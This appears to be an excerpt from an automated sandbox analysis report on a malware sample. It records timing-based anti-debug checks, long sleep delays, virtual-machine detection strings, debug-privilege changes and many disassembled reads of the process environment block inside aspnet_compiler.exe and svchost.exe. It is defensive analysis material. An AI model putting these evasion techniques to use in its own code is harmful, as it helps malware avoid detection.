Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000C68604 second address: 0000000000C6860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000C6898E second address: 0000000000C68994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fooYgfbxno.exe TID: 6284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 7084 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 5440 Thread sleep time: -34000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Source: C:\Users\user\Desktop\fooYgfbxno.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 5.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information queried: ProcessInformation
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m&ven_n
Source: explorer.exe, 00000003.00000000.303097159.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.291164109.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.335060863.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000003.00000000.271804441.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
Source: explorer.exe, 00000003.00000000.311813363.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.311602484.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.296334377.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: C:\Users\user\Desktop\fooYgfbxno.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B944 mov eax, dword ptr fs:[00000030h] 2_2_0153B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B171 mov eax, dword ptr fs:[00000030h] 2_2_0151B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151C962 mov eax, dword ptr fs:[00000030h] 2_2_0151C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519100 mov eax, dword ptr fs:[00000030h] 2_2_01519100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154513A mov eax, dword ptr fs:[00000030h] 2_2_0154513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov eax, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01534120 mov ecx, dword ptr fs:[00000030h] 2_2_01534120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0151B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015A41E8 mov eax, dword ptr fs:[00000030h] 2_2_015A41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542990 mov eax, dword ptr fs:[00000030h] 2_2_01542990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154A185 mov eax, dword ptr fs:[00000030h] 2_2_0154A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153C182 mov eax, dword ptr fs:[00000030h] 2_2_0153C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015951BE mov eax, dword ptr fs:[00000030h] 2_2_015951BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov ecx, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015399BF mov eax, dword ptr fs:[00000030h] 2_2_015399BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015461A0 mov eax, dword ptr fs:[00000030h] 2_2_015461A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D49A4 mov eax, dword ptr fs:[00000030h] 2_2_015D49A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015969A6 mov eax, dword ptr fs:[00000030h] 2_2_015969A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01530050 mov eax, dword ptr fs:[00000030h] 2_2_01530050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E1074 mov eax, dword ptr fs:[00000030h] 2_2_015E1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D2073 mov eax, dword ptr fs:[00000030h] 2_2_015D2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E4015 mov eax, dword ptr fs:[00000030h] 2_2_015E4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01597016 mov eax, dword ptr fs:[00000030h] 2_2_01597016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A830 mov eax, dword ptr fs:[00000030h] 2_2_0153A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0152B02A mov eax, dword ptr fs:[00000030h] 2_2_0152B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154002D mov eax, dword ptr fs:[00000030h] 2_2_0154002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov eax, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015AB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_015AB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015140E1 mov eax, dword ptr fs:[00000030h] 2_2_015140E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0153B8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015158EC mov eax, dword ptr fs:[00000030h] 2_2_015158EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519080 mov eax, dword ptr fs:[00000030h] 2_2_01519080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01593884 mov eax, dword ptr fs:[00000030h] 2_2_01593884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0154F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154F0BF mov eax, dword ptr fs:[00000030h] 2_2_0154F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015420A0 mov eax, dword ptr fs:[00000030h] 2_2_015420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015590AF mov eax, dword ptr fs:[00000030h] 2_2_015590AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8B58 mov eax, dword ptr fs:[00000030h] 2_2_015E8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151F358 mov eax, dword ptr fs:[00000030h] 2_2_0151F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151DB40 mov eax, dword ptr fs:[00000030h] 2_2_0151DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h] 2_2_01543B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01543B7A mov eax, dword ptr fs:[00000030h] 2_2_01543B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0151DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D131B mov eax, dword ptr fs:[00000030h] 2_2_015D131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A309 mov eax, dword ptr fs:[00000030h] 2_2_0153A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015953CA mov eax, dword ptr fs:[00000030h] 2_2_015953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015953CA mov eax, dword ptr fs:[00000030h] 2_2_015953CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015403E2 mov eax, dword ptr fs:[00000030h] 2_2_015403E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0153DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov ecx, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015C23E3 mov eax, dword ptr fs:[00000030h] 2_2_015C23E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542397 mov eax, dword ptr fs:[00000030h] 2_2_01542397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154B390 mov eax, dword ptr fs:[00000030h] 2_2_0154B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h] 2_2_0153EB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153EB9A mov eax, dword ptr fs:[00000030h] 2_2_0153EB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D138A mov eax, dword ptr fs:[00000030h] 2_2_015D138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CD380 mov ecx, dword ptr fs:[00000030h] 2_2_015CD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h] 2_2_01521B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01521B8F mov eax, dword ptr fs:[00000030h] 2_2_01521B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0154138B mov eax, dword ptr fs:[00000030h] 2_2_0154138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01544BAD mov eax, dword ptr fs:[00000030h] 2_2_01544BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E5BA5 mov eax, dword ptr fs:[00000030h] 2_2_015E5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DEA55 mov eax, dword ptr fs:[00000030h] 2_2_015DEA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015A4257 mov eax, dword ptr fs:[00000030h] 2_2_015A4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01519240 mov eax, dword ptr fs:[00000030h] 2_2_01519240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0155927A mov eax, dword ptr fs:[00000030h] 2_2_0155927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h] 2_2_015CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015CB260 mov eax, dword ptr fs:[00000030h] 2_2_015CB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015E8A62 mov eax, dword ptr fs:[00000030h] 2_2_015E8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov ecx, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01515210 mov eax, dword ptr fs:[00000030h] 2_2_01515210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h] 2_2_0151AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0151AA16 mov eax, dword ptr fs:[00000030h] 2_2_0151AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h] 2_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015DAA16 mov eax, dword ptr fs:[00000030h] 2_2_015DAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01533A1C mov eax, dword ptr fs:[00000030h] 2_2_01533A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01528A0A mov eax, dword ptr fs:[00000030h] 2_2_01528A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153B236 mov eax, dword ptr fs:[00000030h] 2_2_0153B236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01554A2C mov eax, dword ptr fs:[00000030h] 2_2_01554A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01554A2C mov eax, dword ptr fs:[00000030h] 2_2_01554A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_0153A229 mov eax, dword ptr fs:[00000030h] 2_2_0153A229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542ACB mov eax, dword ptr fs:[00000030h] 2_2_01542ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_01542AE4 mov eax, dword ptr fs:[00000030h] 2_2_01542AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 2_2_015D4AEF mov eax, dword ptr fs:[00000030h] 2_2_015D4AEF
